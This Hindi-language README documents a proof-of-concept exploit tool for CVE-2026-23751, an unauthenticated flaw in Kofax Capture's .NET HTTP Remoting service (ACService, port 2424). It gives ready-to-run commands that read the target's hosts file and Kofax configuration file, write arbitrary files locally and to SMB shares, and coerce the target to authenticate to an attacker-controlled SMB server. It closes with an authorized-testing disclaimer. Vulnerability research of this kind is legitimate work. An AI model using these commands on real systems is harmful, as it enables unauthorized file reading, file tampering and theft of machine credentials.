
पैच किया गया RemotingClient CVE-2026-23751 का शोषण करने के लिए (Tungsten Automation - Kofax Capture बिना प्रमाणीकरण के फ़ाइल पढ़ना/लिखना और .NET HTTP Remoting के माध्यम से SMB ज़बरदस्ती)
Code White के NewRemotingTricks में वर्णित तकनीक का प्रूफ-ऑफ-कॉन्सेप्ट पुनःकार्यान्वयन, जो Tungsten Automation Kofax Capture को लक्षित करता है।
शीर्षक: Tungsten Automation - Kofax Capture .NET HTTP Remoting के माध्यम से अनधिकृत फ़ाइल पढ़ना/लिखना और SMB ज़बरदस्ती
CVE: CVE-2026-23751
CVE-2026-23751 Tungsten Automation Kofax Capture को प्रभावित करता है और एक अनधिकृत दूरस्थ हमलावर को Kofax Capture ACService द्वारा उजागर किए गए .NET HTTP Remoting एंडपॉइंट के साथ इंटरैक्ट करने की अनुमति देता है।
इस भेद्यता का दुरुपयोग निम्नलिखित कार्यों के लिए किया जा सकता है:
PoC Code White के NewRemotingTricks प्रोजेक्ट से प्रासंगिक .NET Remoting तकनीक का पुनःकार्यान्वयन करता है।
PoC Kofax Capture ACService HTTP Remoting एंडपॉइंट को लक्षित करता है:
http://<target>:2424/ACService
पोर्ट 2424 प्रभावित सेवा द्वारा उपयोग किया जाने वाला डिफ़ॉल्ट HTTP Remoting पोर्ट है।
निम्नलिखित उदाहरण लक्ष्य से Windows hosts फ़ाइल पढ़ता है:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Kofax Capture कॉन्फ़िगरेशन फ़ाइल को भी इसी तरह पढ़ा जा सकता है:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
लक्ष्य पथ के बाद सामग्री प्रदान करके Kofax Capture सेवा के लिए सुलभ स्थान पर एक फ़ाइल लिखी जा सकती है:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
दूरस्थ SMB शेयर पर लिखने के लिए समान कार्यक्षमता का उपयोग UNC पथ के साथ किया जा सकता है:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
दूरस्थ संसाधन तक पहुंचने की क्षमता Kofax Capture सेवा की अनुमतियों और सुरक्षा संदर्भ पर निर्भर करती है।
लक्ष्य को दूरस्थ SMB संसाधन तक पहुंचने के लिए प्रेरित करने हेतु file:// URI प्रदान किया जा सकता है:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
यह लक्ष्य वातावरण और उसकी सुरक्षा कॉन्फ़िगरेशन के आधार पर, प्रभावित होस्ट को हमलावर-नियंत्रित SMB सर्वर पर प्रमाणित करने का कारण बन सकता है।
इस भेद्यता में Kofax Capture के ACService द्वारा .NET HTTP Remoting का उपयोग शामिल है।
.NET Remoting विभिन्न URI स्कीम और ऑब्जेक्ट सीरियलाइज़ेशन तंत्रों का समर्थन करता है। उजागर रिमोटिंग एंडपॉइंट के साथ एक विशिष्ट तरीके से इंटरैक्ट करके, एक अनधिकृत क्लाइंट सेवा को क्लाइंट द्वारा प्रदान किए गए पथों का उपयोग करके फ़ाइल-सिस्टम संचालन करने के लिए प्रेरित कर सकता है।
PoC प्रदर्शित करता है कि इस व्यवहार का उपयोग कैसे किया जा सकता है:
file:// संसाधनों तक पहुंच ट्रिगर करनाPoC वर्तमान में फ़ाइलों में स्ट्रिंग डेटा लिखने का प्रदर्शन करता है। अन्य फ़ाइल प्रकार और पेलोड प्रारूपों को स्रोत कोड में तदनुसार संशोधित करके समर्थित किया जा सकता है।
यह कार्यान्वयन निम्नलिखित में प्रस्तुत शोध और तकनीकों पर आधारित है:
Code White - NewRemotingTricks
ACService तक नेटवर्क पहुंचRemotingClient_MBRO_Lazy.exeशोषण के लिए Kofax Capture सेवा में कोई प्रमाणीकरण आवश्यक नहीं है।
यह रिपॉजिटरी केवल सुरक्षा अनुसंधान, भेद्यता सत्यापन, और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान की गई है।
स्पष्ट प्राधिकरण के बिना किसी भी सिस्टम के विरुद्ध इस PoC का उपयोग न करें। लेखक इस सॉफ़्टवेयर के दुरुपयोग से उत्पन्न क्षति, डेटा हानि, अनधिकृत पहुंच, या अन्य परिणामों के लिए ज़िम्मेदार नहीं है।